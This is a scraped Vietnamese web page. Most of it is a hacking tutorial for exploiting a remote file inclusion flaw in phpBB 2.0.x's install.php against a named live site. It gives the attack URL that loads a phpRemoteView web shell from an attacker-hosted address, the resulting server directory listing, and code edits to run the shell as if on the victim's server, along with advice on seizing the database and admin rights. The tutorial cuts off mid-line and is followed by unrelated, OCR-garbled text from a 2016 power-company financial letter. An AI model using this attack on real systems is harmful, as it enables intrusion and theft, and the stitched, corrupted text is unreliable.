Cick xem file tài liệu, giáo án, bài giảng , luận văn, luận án, đồ án, bài tập lớn về tất cả các lĩnh vực kinh tế, kinh...
Sử dụng REM VIEW để xem file trên Server :trang này đã được đọc lần Lỗi sử dụng ở đây là lỗi trong file install.php của forum phpBB 2.0.1 và 2.0.2, các forum dạng này và dính lỗi này rát khổ biến trên NET và Luke đã không khó để có thể chọn random một site làm ví dụ http://www.cyberantics.net/forum/ Bước 1: Kiểm tra xem site đó còn file install.php hay không http://www.cyberantics.net/forum/install.php và may mắn câu trả lời là có. Chúng ta cần chú ý về mã nguồn PHP của nó một chút. Quote Và đồng thời tôi nhập URL sau http://www.cyberantics.net/forum/install.php?phpbb_root_dir=http://www21.brinkster.com/hainamluke/ kết quả nhận được là Quote *Index of /var/www/html/forum/ REMVIEW TOOLS >> [dir commands] type name size owner:group perms mtime DIR admin hackman hackman drwxr-xr-x 20/05/02 08:28:36 DIR contrib hackman hackman drwxr-xr-x 20/05/02 08:28:37 DIR db hackman hackman drwxr-xr-x 20/05/02 08:28:38 DIR docs hackman hackman drwxr-xr-x 20/05/02 08:28:42 DIR images hackman hackman drwxr-xr-x 20/05/02 08:28:45 DIR includes hackman hackman drwxr-xr-x 20/05/02 08:28:47 DIR language hackman hackman drwxr-xr-x 20/05/02 08:28:47 DIR templates hackman hackman drwxr-xr-x 20/05/02 08:28:51 ??/a> ??/a> common.php 5 316 hackman hackman -rw-r--r-- 20/05/02 08:28:36 ??/a> ??/a> config.php 271 hackman hackman -rw-r--r-- 23/05/02 19:17:13 ??/a> ??/a> extension.inc 810 hackman hackman -rw-r--r-- 20/05/02 08:28:42 ??/a> ??/a> faq.php 3 596 hackman hackman -rw-r--r-- 20/05/02 08:28:42 ??/a> ??/a> groupcp.php 45 881 hackman hackman -rw-r--r-- 20/05/02 08:28:42 ??/a> ??/a> index.php 14 298 hackman hackman -rw-r--r-- 20/05/02 08:28:47 ??/a> ??/a> install.php 33 617 hackman hackman -rw-r--r-- 20/05/02 08:28:47 ??/a> ??/a> login.php 6 996 hackman hackman -rw-r--r-- 20/05/02 08:28:50 ??/a> ??/a> memberlist.php 12 112 hackman hackman -rw-r--r-- 20/05/02 08:28:50 ??/a> ??/a> modcp.php 33 764 hackman hackman -rw-r--r-- 20/05/02 08:28:50 ??/a> ??/a> posting.php 34 073 hackman hackman -rw-r--r-- 20/05/02 08:28:50 ??/a> ??/a> privmsg.php 68 622 hackman hackman -rw-r--r-- 20/05/02 08:28:51 ??/a> ??/a> profile.php 3 834 hackman hackman -rw-r--r-- 20/05/02 08:28:51 ??/a> ??/a> search.php 40 471 hackman hackman -rw-r--r-- 20/05/02 08:28:51 ??/a> ??/a> update_to_201.php 24 899 hackman hackman -rw-r--r-- 20/05/02 08:29:08 ??/a> ??/a> upgrade.php 57 040 hackman hackman -rw-r--r-- 20/05/02 08:29:08 ??/a> ??/a> viewforum.php 23 181 hackman hackman -rw-r--r-- 20/05/02 08:29:09 ??/a> ??/a> viewonline.php 7 231 hackman hackman -rw-r--r-- 20/05/02 08:29:09 ??/a> ??/a> viewtopic.php 45 435 hackman hackman -rw-r--r-- 20/05/02 08:29:09 phpRemoteView, version 2002-08-05. Free download - php.spb.ru/remview Nói vậy chắc các bạn cũng đã hiểu qua về lỗi này. Nếu các bạn thay mã nguồn của file remview kia bằng một file dạng DBManager thì bạn có thể access tới toàn bộ DB của victim và lên Admin dễ dàng. Bây giờ tôi xin nói chi tiết hơn về cách sử dụng remview dạng này. Nếu bạn muốn sử dụng remview như là đang có một file thật trên server của victim thì bạn phải edit đoạn mã sau trong file http://www21.brinkster/hainamluke/includes/functions_selects.php ########## FIND ########### $self=$HTTP_SERVER_VARS['PHP_SELF']; ######################### ######### REPLACE ######### $self= "http://www.cyberantics.net/forum/install.php?phpbb_root TONG CONG TY PHAT DIEN CONG TY CO PIIAN NH~T DI~N BA RJA S6: C(>NG HOA xA H(>I CHU NGHiA VI~T NAM · 1-il-t INDBR-TCKT Di}c I~p -Tv - H;_mh phuc Ba Ria, ngi:ty 20 thimg OJ niim 2016 V/v giai trinh nguyen nhiin lqi nhu!ln Quy 4/2015 Iiii va tang so v&i cung ky niim tnr&c Kinh gui: - Uy ban Cht!ng khoan NM nu6c; -Sa Giao djch cht!ng khoan TP H6 Chi Minh Cong ty c6 phAn Nhi~t di~n Ba Ria xin giai trinh nguyen nhiin lqi nhu?n Quy nam 2015 !iii va tang so v6i cung ky nam tru6c 1a do: Nhu du h~ thfmg di~n Qu6c gia huy d